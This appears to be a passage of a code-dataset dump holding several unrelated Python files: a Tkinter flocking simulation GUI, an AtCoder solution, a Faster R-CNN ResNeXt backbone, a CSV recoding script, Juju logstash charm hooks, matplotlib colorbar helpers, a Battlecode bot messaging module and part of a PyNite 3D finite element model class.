orient=tk.HORIZONTAL,\n\t\t\t\t\t\t\tlength=self.sim_width // 2, resolution=10, variable=tk.DoubleVar(self, 100)),\n\t\t\ttk.Label(lh_settings_frame, text=\"\\nLClick for Green LightHouse\\n\"\n\t\t\t\t\t\t\t\t\t\t\t \"RClick for Red LightHouse\\n\"\n\t\t\t\t\t\t\t\t\t\t\t \"MClick on a LightHouse to remove\\n\")\n\t\t]\n\t\tfor scale in self.lh_settings:\n\t\t\tscale.pack()\n\n\n\n\t\t# Field\n\t\ttk.Scale(field_frame, from_=0, to=30, length=self.sim_width, orient=tk.HORIZONTAL,\n\t\t \t\tvariable=self.fps, command=self.check_wake_up, label=\"FPS\").pack()\n\t\tself.field = tk.Canvas(field_frame, width=self.sim_width, height=self.sim_width, bg=\"black\")\n\t\tself.field.pack()\n\t\t# event strings restored to match the help label above: left click adds a green\n\t\t# lighthouse, middle click removes, right click adds a red lighthouse\n\t\tself.field.bind(\"<Button-1>\", self.add_green_lighthouse)\n\t\tself.field.bind(\"<Button-2>\", self.del_lighthouse)\n\t\tself.field.bind(\"<Button-3>\", self.add_red_lighthouse)\n\n\t\t# controls\n\t\tcontrol_frame.pack()\n\n\t\ttk.Scale(control_frame, from_=1, to=100, length=self.sim_width, orient=tk.HORIZONTAL,\n\t\t \t\tvariable=self.fpop, label=\"FlockAgent population\").grid(row=0, column=0, columnspan=2)\n\n\t\ttk.Button(control_frame, text=\"Setup\", command=self.setup_sim).grid(row=2, column=0)\n\t\tself.go_stop_button = tk.Button(control_frame, text=\"Go\", command=self.go_stop)\n\t\tself.go_stop_button.grid(row=2, column=1)\n\n\tdef auto_render(self):\n\t\tself.__running = True\n\t\tself.render_all()\n\t\tfps = self.fps.get() #local copy non-atomic\n\t\tif(fps):\n\t\t\tself.__id_auto_render = self.after(int(1/fps*1000), self.auto_render)\n\t\telse:\n\t\t\tself.__running = False\n\n\tdef cancel_auto_render(self):\n\t\tself.after_cancel(self.__id_auto_render)\n\t\tself.__running = None\n\n\tdef check_wake_up(self, v):\n\t\tif(self.__running is not None and not 
self.__running):\n\t\t\tprint(v)\n\t\t\tif(v != 0):\n\t\t\t\tself.__running = True\n\t\t\t\tself.auto_render()\n\n\tdef render_all(self):\n\t\tfor agent in self.context.get_agents():\n\t\t\tagent.render(self.field)\n\n\tdef setup_sim(self):\n\t\tself.context.del_agents(self.context.get_agents())\n\t\tself.field.delete(tk.ALL)\n\t\toptions = dict([(s.trait, float(s.get())) for s in self.flock_settings])\n\t\tprint(options)\n\t\tfor i in range(self.fpop.get()):\n\t\t\tFlockAgent(context=self.context, pos=(random()*self.sim_width, random()*self.sim_width), rotation=np.pi * 2.0 * np.random.random(), **options)\n\t\tself.auto_render()\n\n\tdef go_stop(self):\n\t\tself.__sim_running = not self.__sim_running\n\t\tif(self.__sim_running):\n\t\t\tself.go_stop_button.configure(relief=\"sunken\")\n\t\t\tself.auto_sim()\n\t\telse:\n\t\t\tself.go_stop_button.configure(relief=\"raised\")\n\t\t\tself.after_cancel(self.__id_auto_sim)\n\n\tdef auto_sim(self):\n\t\tself.context.update()\n\t\tself.__id_auto_sim = self.after(int(1/self.tps*1000), self.auto_sim)\n\n\tdef __add_lighthouse(self, lhtype, pos):\n\t\tlhtype(self.context, pos, nimbus=100)\n\n\tdef add_green_lighthouse(self, event):\n\t\tself.__add_lighthouse(GreenLighthouse, (event.x, event.y))\n\n\tdef add_red_lighthouse(self, event):\n\t\tself.__add_lighthouse(RedLighthouse, (event.x, event.y))\n\n\tdef del_lighthouse(self, event):\n\t\tlhs = self.context.get_agents(LighthouseAgent)\n\t\tfor lh in lhs:\n\t\t\tif lh.collide_pos((event.x, event.y)):\n\t\t\t\tself.context.del_agents(lh)\n\t\t\t\tself.field.delete(*lh.id)\n","sub_path":"client/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":6044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"544784844","text":"import itertools\nimport math\n\nN = int(input())\nxy = [list(map(int, input().split())) for _ in range(N)]\n\np = itertools.permutations(xy, N)\nans = 0\nfor v in p:\n for i in range(N-1):\n ans += math.sqrt((v[i][0]-v[i+1][0])**2 + (v[i][1]-v[i+1][1])**2)\nans /= math.factorial(N)\nprint(ans)","sub_path":"atcoder/abc/145/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"522726324","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom model.utils.config import cfg\nfrom model.faster_rcnn.faster_rcnn import _fasterRCNN\n\nimport os\nfrom collections import OrderedDict\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport math\nimport torch.utils.model_zoo as model_zoo\nimport pdb\n\nfrom torchvision import models\n\n__all__ = ['resnext50_32x4d', 'resnext101_32x8d']\n\ndout_base_model = {\n 50: 1024,\n 101: 1024,\n}\n\ndef resnext50(pretrained=False, imagenet_weight=False):\n \"\"\"Constructs a ResNext-50_32x4d model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n print('=== Using resnext 50_32x4d ===')\n model = models.resnext50_32x4d()\n if pretrained:\n if imagenet_weight:\n print('=== use {} as backbone'.format(imagenet_weight))\n state_dict = torch.load(imagenet_weight)['state_dict']\n state_dict = exchange_weightkey_in_state_dict(state_dict)\n model.load_state_dict(state_dict)\n else:\n print('=== use pytorch default backbone')\n model = models.resnext50_32x4d(pretrained=True)\n return model\n\n\ndef 
resnext101(pretrained=False, imagenet_weight=False):\n \"\"\"Constructs a ResNext-101_32x8d model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n print('=== Using resnext 101_32x8d ===')\n model = models.resnext101_32x8d()\n if pretrained:\n if imagenet_weight:\n print('=== use {} as backbone'.format(imagenet_weight))\n state_dict = torch.load(imagenet_weight)['state_dict']\n state_dict = exchange_weightkey_in_state_dict(state_dict)\n model.load_state_dict(state_dict)\n else:\n print('=== use pytorch default backbone')\n model = models.resnext101_32x8d(pretrained=True)\n return model\n\n\nclass resnext(_fasterRCNN):\n def __init__(self, classes, num_layers=101, pretrained=False, class_agnostic=False, imagenet_weight=None):\n self.dout_base_model = dout_base_model[num_layers]\n self.pretrained = pretrained\n self.class_agnostic = class_agnostic\n self.num_layers = num_layers\n self.imagenet_weight = imagenet_weight\n\n _fasterRCNN.__init__(self, classes, class_agnostic)\n\n def _init_modules(self):\n if self.num_layers == 50:\n resnext = resnext50(self.pretrained, self.imagenet_weight)\n elif self.num_layers == 101:\n resnext = resnext101(self.pretrained, self.imagenet_weight)\n else:\n raise ValueError('layers should be in [50, 101].')\n\n # if self.pretrained == True:\n # print(\"Loading pretrained weights from %s\" %(self.model_path))\n # state_dict = torch.load(self.model_path)\n # resnet.load_state_dict({k:v for k,v in state_dict.items() if k in resnet.state_dict()})\n\n # Build resnext.\n self.RCNN_base = nn.Sequential(resnext.conv1, resnext.bn1, resnext.relu,\n resnext.maxpool, resnext.layer1, resnext.layer2, resnext.layer3) # until layer3\n\n self.RCNN_top = nn.Sequential(resnext.layer4) # layer4\n\n self.RCNN_cls_score = nn.Linear(dout_base_model[self.num_layers]*2, self.n_classes)\n if self.class_agnostic:\n self.RCNN_bbox_pred = nn.Linear(dout_base_model[self.num_layers]*2, 4)\n else:\n self.RCNN_bbox_pred = nn.Linear(dout_base_model[self.num_layers]*2, 4*self.n_classes)\n\n # # === fix weight\n # # Fix blocks\n # for p in self.RCNN_base[0].parameters(): p.requires_grad=False\n # for p in self.RCNN_base[1].parameters(): p.requires_grad=False\n\n # assert (0 <= cfg.RESNET.FIXED_BLOCKS < 4)\n # print('cfg.RESNET.FIXED_BLOCKS: {}'.format(cfg.RESNET.FIXED_BLOCKS))\n # if cfg.RESNET.FIXED_BLOCKS >= 3:\n # for p in self.RCNN_base[6].parameters(): p.requires_grad=False\n # if cfg.RESNET.FIXED_BLOCKS >= 2:\n # for p in self.RCNN_base[5].parameters(): p.requires_grad=False\n # if cfg.RESNET.FIXED_BLOCKS >= 1:\n # for p in self.RCNN_base[4].parameters(): p.requires_grad=False\n # # ==== === ====\n\n # def set_bn_fix(m):\n # classname = m.__class__.__name__\n # if classname.find('BatchNorm') != -1: # if batchnorm\n # for p in m.parameters(): p.requires_grad=False\n\n # # === fix weight\n # self.RCNN_base.apply(set_bn_fix)\n # self.RCNN_top.apply(set_bn_fix)\n # # === \n\n # def train(self, mode=True):\n # # Override train so that the training mode is set as we want\n # nn.Module.train(self, mode)\n # if mode:\n # # Set fixed blocks to be in eval mode\n # self.RCNN_base.eval()\n # print('train {}to{}'.format(cfg.RESNET.FIXED_BLOCKS+4, len(self.RCNN_base)))\n # for i in range(cfg.DENSENET.FIXED_BLOCKS+4, len(self.RCNN_base)): # 1->5-, 2->6- \n # self.RCNN_base[i].train()\n\n # def set_bn_eval(m):\n # classname = m.__class__.__name__\n # if classname.find('BatchNorm') != -1:\n # m.eval()\n\n # self.RCNN_base.apply(set_bn_eval)\n # 
self.RCNN_top.apply(set_bn_eval)\n\n    def _head_to_tail(self, pool5):\n        # print('head_to_tail: {}'.format(pool5.shape))\n        fc7 = self.RCNN_top(pool5).mean(3).mean(2) # apply RCNN_top to pool5 (the feature map), then mean(3).mean(2)\n        # print('fc7: {}'.format(fc7.shape))\n        return fc7\n\n# function to load weight\ndef exchange_weightkey_in_state_dict(state_dict):\n    new_state_dict= OrderedDict()\n    for k, v in state_dict.items():\n        name=k[7:] #remove 'module.' of DataParallel\n        new_state_dict[name] = v\n    return new_state_dict","sub_path":"lib/model/faster_rcnn/resnext.py","file_name":"resnext.py","file_ext":"py","file_size_in_byte":5466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"38135590","text":"from pandas import read_csv\ndef recod_base(c,k):\n    \"\"\"Uses an existing vals file and recodes the base, using the index column\"\"\"\n    df=read_csv('{}.csv'.format (c) , encoding = 'utf-8' , sep = ';',dtype = str )\n    df_vals=read_csv('{}.csv'.format(k), encoding='utf-8',sep=';')\n    # Fill the empty rows with the value of the variable above. Might come in handy\n    df_vals['variable']=df_vals['variable'].ffill()# takes the value it finds in the first column and fills the empty cells below it, until it meets a different value, which it then uses instead\n    # Now let's group\n    recode=df_vals.groupby('variable').agg(lambda row: list(row))# groups everything so that each column name ends up with a list of indices and a list of values\n    # recode\n    for col in recode.index:# look at the column name, which serves as the index\n        keys=recode.loc[col]['values']# take the value as the key\n        values=recode.loc[col]['index']# take the index as the value for the key\n        mapRecode = dict(zip(keys, values))# pack everything into a dict\n\n        df[col].replace(mapRecode,inplace=True)# take the column whose name is stored in col and replace its values using the dict. The key is what gets replaced, and the value under the key is what it is replaced with\n    df.to_csv( '{}_encode.csv'.format(c) , sep=';' , index=False )# writes the resulting vals to a file\n\nif __name__ == \"__main__\":\n    print(\"This module is meant to be imported\")","sub_path":"recode.py","file_name":"recode.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"390953130","text":"#!/usr/bin/env python\n\nimport sys\n\nfrom charmhelpers.contrib.ansible import apply_playbook\nfrom charmhelpers.contrib.python.packages import pip_install\nfrom charmhelpers.core.hookenv import (\n    Hooks,\n    config,\n    relation_set,\n    status_set,\n    log as juju_log,\n    UnregisteredHookError,\n    open_port\n)\nfrom charmhelpers.core.host import service_running\nfrom charmhelpers.fetch import apt_install\nfrom charmhelpers.contrib.charmsupport import nrpe\n\nrequired_aps = ['build-essential', 'libssl-dev', 'libffi-dev', 'python-dev']\nrequired_pip_packages = [\"Ansible==2.1.4.0\", \"markupsafe\"]\n\nservice_name = 'logstash'\nmsg_install_prereqs = 'Installing Ansible pre-reqs'\nmsg_install_ansible = 'Installing Ansible'\nmsg_install_service = 'Installing ' + service_name\nmsg_config_changed = 'Making configuration changes'\nmsg_service_running = 'Unit is ready'\nmsg_service_stopped = service_name + ' is stopped'\nmsg_service_failed_to_start = service_name + ' failed to start'\n\nstatus_maintenance = 'maintenance'\nstatus_blocked = 'blocked'\nstatus_active = 'active'\n\n\nplaybook = 'playbooks/site.yaml'\n\nhooks = Hooks()\n\n\n@hooks.hook('install', 'upgrade-charm')\ndef install2():\n    \"\"\"\n    Install a custom version of ansible for our charm.\n    Because of the hack required to install python with xenial\n    our install script is called install2, need to call the ansible playbook\n    using the install tag.\n    \"\"\"\n    status_set(status_maintenance, msg_install_prereqs)\n    apt_install(required_aps)\n\n    status_set(status_maintenance, msg_install_ansible)\n    pip_install(required_pip_packages, fatal=True)\n\n    status_set(status_maintenance, msg_install_service)\n    apply_playbook(playbook, tags=['install'])\n\n\n@hooks.hook('config-changed', 'elasticsearch-relation-changed')\ndef config_changed():\n    status_set(status_maintenance, msg_config_changed)\n    apply_playbook(playbook, tags=['config_changed'])\n\n    update_nrpe_config()\n    open_port(config('beats_port'), protocol='TCP')\n    open_port(config('syslog_port'), protocol='TCP')\n    open_port(config('tcp_port'), protocol='TCP')\n\n\n@hooks.hook('nrpe-external-master-relation-joined',\n            'nrpe-external-master-relation-changed')\ndef update_nrpe_config():\n    hostname = nrpe.get_nagios_hostname()\n    current_unit = nrpe.get_nagios_unit_name()\n    services = [service_name]\n    nrpe_setup = nrpe.NRPE(hostname=hostname)\n    nrpe.add_init_service_checks(nrpe_setup, services, current_unit)\n    nrpe_setup.write()\n\n\n@hooks.hook('start')\ndef start():\n    \"\"\"\n    Special process for the start action so that after the playbook is run\n    we can update the status in juju\n    \"\"\"\n    apply_playbook(playbook, tags=['start'])\n    if service_running(service_name):\n        status_set(status_active, msg_service_running)\n    else:\n        status_set(status_maintenance, msg_service_failed_to_start)\n\n\n@hooks.hook('update-status')\ndef update_status():\n    if service_running(service_name):\n        status_set(status_active, msg_service_running)\n    else:\n        status_set(status_maintenance, msg_service_stopped)\n\n\n@hooks.hook('beat-relation-joined')\ndef 
beat_relation_joined():\n relation_set(logstash_port=config('beats_port'))\n\n\n@hooks.hook('stop')\ndef stop():\n apply_playbook(playbook, tags=['stop'])\n\n\nif __name__ == \"__main__\":\n try:\n hooks.execute(sys.argv)\n except UnregisteredHookError as e:\n juju_log('Unknown hook {} - skipping.'.format(e))\n","sub_path":"charms/logstash-deb/hooks/hooks.py","file_name":"hooks.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"495858853","text":"def colorbar_index(ncolors, cmap, labels=None, **kwargs):\n \"\"\"\n This is a convenience function to stop you making off-by-one errors\n Takes a standard colour ramp, and discretizes it,\n then draws a colour bar with correctly aligned labels\n \"\"\"\n cmap = cmap_discretize(cmap, ncolors)\n mappable = cm.ScalarMappable(cmap=cmap)\n mappable.set_array([])\n mappable.set_clim(-0.5, ncolors+0.5)\n colorbar = plt.colorbar(mappable, **kwargs)\n colorbar.set_ticks(np.linspace(0, ncolors, ncolors))\n colorbar.set_ticklabels(range(ncolors))\n if labels:\n colorbar.set_ticklabels(labels)\n return colorbar\n\ndef cmap_discretize(cmap, N):\n \"\"\"\n Return a discrete colormap from the continuous colormap cmap.\n\n cmap: colormap instance, eg. cm.jet.\n N: number of colors.\n\n Example\n x = resize(arange(100), (5,100))\n djet = cmap_discretize(cm.jet, 5)\n imshow(x, cmap=djet)\n\n \"\"\"\n if type (cmap) == str:\n cmap = get_cmap(cmap)\n colors_i = np.concatenate((np.linspace(0,1.,N), (0.,0.,0.,0.)))\n colors_rgba = cmap (colors_i)\n indices = np.linspace(0,1.,N + 1)\n cdict = {}\n for ki, key in enumerate(('red','green','blue')):\n cdict[key] = [(indices[i], colors_rgba[i-1,ki], colors_rgba[i,ki]) for i in xrange(N+1)]\n return matplotlib.colors.LinearSegmentedColormap(cmap.name + \"_%d\" % N, cdict, 1024)","sub_path":"py_functions/colorbar.py","file_name":"colorbar.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"559057589","text":"import utility\n\ndef message_to_castles(robot, mesg_type):\n robot.castleTalk(mesg_type)\n # # Position requesting for pilgrims\n # if mesg_type == 0:\n # temp_store = ((robot.me.x * 1000) + robot.me.y) * 1000 + 0\n # robot.castleTalk(temp_store)\n # # Position requesting for combat units\n # if mesg_type == 1:\n # temp_store = ((robot.me.x * 1000) + robot.me.y) * 1000 + 1\n # robot.castleTalk(temp_store)\n\ndef self_communicate_loop(robot):\n robot.signal(robot.me.signal, 0)\n\ndef convert_position_to_message(pos_x, pos_y):\n return pos_x * 100 + pos_y + 6464\n\ndef convert_message_to_position(message):\n message = message - 6464\n return (message //100, message % 100)\n\ndef can_compute_others(message: int) -> bool:\n bin_str = utility.convert_to_binary(message)\n if bin_str[0] == \"0\":\n return False\n else:\n return True\n\ndef message_parsing(message: int, flag: int) -> bool:\n if flag == 1:\n return can_compute_others(message)\n else:\n # TODO: implement other flag logic\n return False\n\ndef _store_destination(dest_x: int, dest_y: int, bin_list: list) -> None:\n '''\n dest_x: abscissa of mine's location (decimal)\n dest_y: ordinate of mine's location (decimal)\n bin_list: self loop message of pilgrim as a list of string (binary\n representation)\n\n First 4 bits of bin_list are reserved for storing information about next\n move.\n '''\n x_bin = utility.convert_to_binary(dest_x)\n y_bin = 
utility.convert_to_binary(dest_y)\n start = 4\n # copy binary of x to self loop message\n for i in range(10, 16):\n bin_list[start] = x_bin[i]\n start += 1\n # copy binary of y to self loop message\n for i in range(10, 16):\n bin_list[start] = y_bin[i]\n start += 1\n\ndef _store_next_step(astar_path: list, bin_list: list, directions: list) -> None:\n '''\n The first 4 bits are used to store the next step\n directions (list): 12 movements of pilgrim (check pilgrim_directions in\n constant module)\n '''\n if len(astar_path) == 1:\n bin_list[3] = '1'\n for i in range(3):\n bin_list[i] = '0'\n return None\n\n step = astar_path[0]\n second_step = astar_path[1]\n dx = second_step[0] - step[0]\n dy = second_step[1] - step[1]\n ans = None\n for i in range(len(directions)):\n direction = directions[i]\n if (dx, dy) == direction:\n ans = i\n break\n step_byte = utility.convert_to_binary(ans)\n iter_ = 0\n for i in range(12, 16):\n bin_list[iter_] = step_byte[i]\n iter_ += 1\n\ndef encode_msg_with_direction(dest_x: int, dest_y: int,\n astar_path: list, directions: list) -> int:\n bin_list = ['0' for i in range(16)]\n _store_destination(dest_x, dest_y, bin_list)\n _store_next_step(astar_path, bin_list, directions)\n return utility.convert_to_decimal(\"\".join(bin_list))\n\ndef encode_msg_without_direction(dest_x: int, dest_y: int) -> int:\n bin_list = ['0' for i in range(16)]\n _store_destination(dest_x, dest_y, bin_list)\n return utility.convert_to_decimal(\"\".join(bin_list))\n\ndef decode_msg_with_direction(message: int, directions: list) -> tuple:\n binary_str = utility.convert_to_binary(message)\n direction = utility.convert_to_decimal(binary_str[0:4])\n x_destination = utility.convert_to_decimal(binary_str[4:10])\n y_destination = utility.convert_to_decimal(binary_str[10:16])\n return (direction, x_destination, y_destination)\n\ndef decode_msg_without_direction(message: int) -> tuple:\n binary_str = utility.convert_to_binary(message)\n x_destination = utility.convert_to_decimal(binary_str[4:10])\n y_destination = utility.convert_to_decimal(binary_str[10:16])\n return (x_destination, y_destination)\n","sub_path":"bc19-scaffold/bots/14.ScrapBot1/communications.py","file_name":"communications.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"324338187","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 9 21:11:20 2017\r\n\r\n@author: D. Craig Brinck, SE\r\n\"\"\"\r\n# %%\r\nfrom numpy import zeros, delete, insert, matmul, subtract\r\nfrom numpy.linalg import inv\r\nfrom PyNite.Node3D import Node3D\r\nfrom PyNite.Member3D import Member3D\r\nfrom .Material import Material\r\nfrom .Viewer3D import Viewer3D\r\nfrom . 
import Section\r\n\r\n# %%\r\nclass FEModel3D():\r\n \"\"\"\r\n A class representing a 3D finite element model.\r\n \"\"\"\r\n#%%\r\n def __init__(self):\r\n \"\"\"\r\n Initializes a new 3D finite element model.\r\n \"\"\"\r\n \r\n self.__Nodes = [] # A list of the structure's nodes\r\n self.__Members = [] # A list of the structure's members\r\n self.__D = [] # A list of the structure's nodal displacements\r\n\r\n#%%\r\n def AddNode(self, Name, X, Y, Z):\r\n \"\"\"\r\n Adds a new node to the model.\r\n \r\n Parameters\r\n ----------\r\n Name : string\r\n A unique user-defined name for the node.\r\n X : number\r\n The global X-coordinate of the node.\r\n Y : number\r\n The global Y-coordinate of the node.\r\n Z : number\r\n The global Z-coordinate of the node.\r\n \"\"\"\r\n \r\n # Create a new node\r\n newNode = Node3D(Name, X, Y, Z)\r\n \r\n # Add the new node to the list\r\n self.__Nodes.append(newNode)\r\n\r\n#%%\r\n def AddMember(self, Name, iNode, jNode, E, G, Iy, Iz, J, A, ik_ref=None):\r\n \"\"\"\r\n Adds a new member to the model.\r\n \r\n Parameters\r\n ----------\r\n Name : string\r\n A unique user-defined name for the member.\r\n iNode : string\r\n The name of the i-node (start node).\r\n jNode : string\r\n The name of the j-node (end node).\r\n E : number\r\n The modulus of elasticity of the member.\r\n G : number\r\n The shear modulus of the member.\r\n Iy : number\r\n The moment of inertia of the member about its local y-axis.\r\n Iz : number\r\n The moment of inertia of the member about its local z-axis.\r\n J : number\r\n The polar moment of inertia of the member.\r\n A : number\r\n The cross-sectional area of the member.\r\n ik_ref : 3D coordinate (numpy 1D array), optional\r\n reference point in ik-plane of the beam (default is None)\r\n \"\"\"\r\n \r\n # Create a new member\r\n material = Material(E, G)\r\n section = Section.Generic(Iy, Iz, J, A)\r\n self.AddMemberExt(Name, iNode, jNode, material, section, ik_ref)\r\n\r\n#%%\r\n def AddMemberExt(self, Name, iNode, jNode, material, section, ik_ref=None):\r\n \"\"\"\r\n Adds a new member to the model.\r\n \r\n Parameters\r\n ----------\r\n Name : string\r\n A unique user-defined name for the member.\r\n iNode : string\r\n The name of the i-node (start node).\r\n jNode : string\r\n The name of the j-node (end node).\r\n material : Material\r\n PyNite Material object\r\n section : Section\r\n PyNite Section object\r\n ik_ref : 3D coordinate (numpy 1D array), optional\r\n reference point in ik-plane of the beam (default is None)\r\n \"\"\"\r\n \r\n # Create a new member\r\n newMember = Member3D(Name, self.GetNode(iNode), self.GetNode(jNode), material, section, ik_ref)\r\n \r\n # Add the new member to the list\r\n self.__Members.append(newMember)\r\n\r\n#%%\r\n def RemoveNode(self, Node):\r\n \"\"\"\r\n Removes a node from the model. All nodal loads associated with the\r\n node and members attached to the node will also be removed.\r\n \r\n Parameters\r\n ----------\r\n Node : string\r\n The name of the node to be removed.\r\n \"\"\"\r\n \r\n # Remove the node. Nodal loads are stored within the node, so they\r\n # will be deleted automatically when the node is deleted.\r\n self.__Nodes.remove(self.GetNode(Node))\r\n \r\n # Find any members attached to the node and remove them\r\n self.__Members = [member for member in self.__Members if member.iNode.Name != Node and member.jNode.Name != Node]\r\n \r\n#%%\r\n def RemoveMember(self, Member):\r\n \"\"\"\r\n Removes a member from the model. 
All member loads associated with the\r\n member will also be removed.\r\n \r\n Parameters\r\n ----------\r\n Member : string\r\n The name of the member to be removed.\r\n \"\"\"\r\n \r\n # Remove the member. Member loads are stored within the member, so they\r\n # will be deleted automatically when the member is deleted.\r\n self.__Members.remove(self.GetMember(Member))\r\n \r\n#%%\r\n def DefineSupport(self, Node, SupportDX = False, SupportDY = False, SupportDZ = False, SupportRX = False, SupportRY = False, SupportRZ = False):\r\n \"\"\"\r\n Defines the support conditions at a node.\r\n \r\n Nodes will default to fully unsupported unless specified otherwise.\r\n \r\n Parameters\r\n ----------\r\n Node : string\r\n The name of the node where the support is being defined\r\n SupportDX : boolean\r\n Indicates whether the node is supported against translation in the global X-direction.\r\n SupportDY : boolean\r\n Indicates whether the node is supported against translation in the global Y-direction.\r\n SupportDZ : boolean\r\n Indicates whether the node is supported against translation in the global Z-direction.\r\n SupportRX : boolean\r\n Indicates whether the node is supported against rotation about the global X-axis.\r\n SupportRY : boolean\r\n Indicates whether the node is supported against rotation about the global Y-axis.\r\n SupportRZ : boolean\r\n Indicates whether the node is supported against rotation about the global Z-axis.\r\n \"\"\"\r\n \r\n # Get the node to be supported\r\n node = self.GetNode(Node)\r\n \r\n # Set the node's supports\r\n node.SupportDX = SupportDX\r\n node.SupportDY = SupportDY\r\n node.SupportDZ = SupportDZ\r\n node.SupportRX = SupportRX\r\n node.SupportRY = SupportRY\r\n node.SupportRZ = SupportRZ\r\n\r\n#%%\r\n def DefineReleases(self, Member, Dxi = False, Dyi = False, Dzi = False, Rxi = False, Ryi = False, Rzi = False, Dxj = False, Dyj = False, Dzj = False, Rxj = False, Ryj = False, Rzj = False):\r\n \"\"\"\r\n Defines member end releases.\r\n \r\n All member end releases will default to unreleased unless specified otherwise.\r\n \r\n Parameters\r\n ----------\r\n Member : string\r\n The name of the member to have its releases modified.\r\n Dxi : boolean\r\n Indicates whether the member is released axially at its start.\r\n Dyi : boolean\r\n Indicates whether the member is released for shear in the local y-axis at its start.\r\n Dzi : boolean\r\n Indicates whether the member is released for shear in the local z-axis at its start.\r\n Rxi : boolean\r\n Indicates whether the member is released for torsion at its start.\r\n Ryi : boolean\r\n Indicates whether the member is released for moment about the local y-axis at its start.\r\n Rzi : boolean\r\n Indicates whether the member is released for moment about the local z-axis at its start.\r\n Dxj : boolean\r\n Indicates whether the member is released axially at its end.\r\n Dyj : boolean\r\n Indicates whether the member is released for shear in the local y-axis at its end.\r\n Dzj : boolean\r\n Indicates whether the member is released for shear in the local z-axis.\r\n Rxj : boolean\r\n Indicates whether the member is released for torsion at its end.\r\n Ryj : boolean\r\n Indicates whether the member is released for moment about the local y-axis at its end.\r\n Rzj : boolean\r\n Indicates whether the member is released for moment about the local z-axis at its end.\r\n \"\"\"\r\n \r\n # Apply the end releases to the member\r\n self.GetMember(Member).Releases = [Dxi, Dyi, Dzi, Rxi, Ryi, Rzi, Dxj, Dyj, Dzj, Rxj, 
Ryj, Rzj] \r\n \r\n#%%\r\n def AddNodeLoad(self, Node, Direction, P):\r\n \"\"\"\r\n Adds a nodal load to the model.\r\n \r\n Parameters\r\n ----------\r\n Node : string\r\n The name of the node where the load is being applied.\r\n Direction : {'FX', 'FY', 'FZ', 'MX', 'MY', 'MZ'}\r\n The global direction the load is being applied in. Forces are 'FX', 'FY', and 'FZ'. Moments are 'MX', 'MY', and 'MZ'.\r\n P : number\r\n The numeric value (magnitude) of the load.\r\n \"\"\"\r\n \r\n # Add the node load to the model\r\n self.GetNode(Node).NodeLoads.append([Direction, P])\r\n\r\n#%% \r\n def AddMemberPtLoad(self, Member, Direction, P, x):\r\n \"\"\"\r\n Adds a member point load to the model.\r\n \r\n Parameters\r\n ----------\r\n Member : string\r\n The name of the member the load is being applied to.\r\n Direction : {'Fx', 'Fy', 'Fz', 'My', 'Mz'}\r\n The direction in which the force is to be applied. Note that\r\n typical beam sign convention is used. Transverse forces acting\r\n toward the beam are positive. Moments are positive if they act\r\n counter-clockwise relative to the beam's local coordinate system.\r\n Torsional point loads are not supported at this time.\r\n P : number\r\n The numeric value (magnitude) of the load.\r\n x : number\r\n The load's location along the member's local x-axis.\r\n \"\"\"\r\n \r\n # Add the point load to the member\r\n self.GetMember(Member).PtLoads.append((Direction, P, x))\r\n\r\n#%%\r\n def AddMemberDistLoad(self, Member, Direction, w1, w2, x1, x2):\r\n \"\"\"\r\n Adds a member distributed load to the model.\r\n \r\n Parameters\r\n ----------\r\n Member : string\r\n The name of the member the load is being appied to\r\n Direction : {'Fx', 'Fy', 'Fz'}\r\n The direction in which the load is to be applied. Note that\r\n typical beam sign convention is used. Forces acting toward the beam\r\n are positive.\r\n w1 : number\r\n The starting value (magnitude) of the load.\r\n w2 : number\r\n The ending value (magnitude) of the load.\r\n x1 : number\r\n The load's start location along the member's local x-axis.\r\n x2 : number\r\n The load's end location along the member's local x-axis.\r\n \"\"\"\r\n \r\n # Add the distributed load to the member\r\n self.GetMember(Member).DistLoads.append((Direction, w1, w2, x1, x2))\r\n\r\n#%%\r\n def GetNode(self, Name):\r\n \"\"\"\r\n Returns the node with the given name.\r\n \r\n Parameters\r\n ----------\r\n Name : string\r\n The name of the node to be returned.\r\n \"\"\"\r\n \r\n # Step through each node in the '__Nodes' list\r\n for node in self.__Nodes:\r\n \r\n # Check the name of the node\r\n if node.Name == Name:\r\n \r\n # Return the node of interest\r\n return node\r\n\r\n#%%\r\n def GetMember(self, Name):\r\n \"\"\"\r\n Returns the member with the given name.\r\n \r\n Parameters\r\n ----------\r\n Name : string\r\n The name of the member to be returned.\r\n \"\"\"\r\n \r\n # Step through each member in the '__Members' list\r\n for member in self.__Members:\r\n \r\n # Check the name of the member\r\n if member.Name == Name:\r\n \r\n # Return the member of interest\r\n return member\r\n\r\n#%%\r\n def __Renumber(self):\r\n \"\"\"\r\n Assigns node and member ID numbers to be used internally by the\r\n program. 
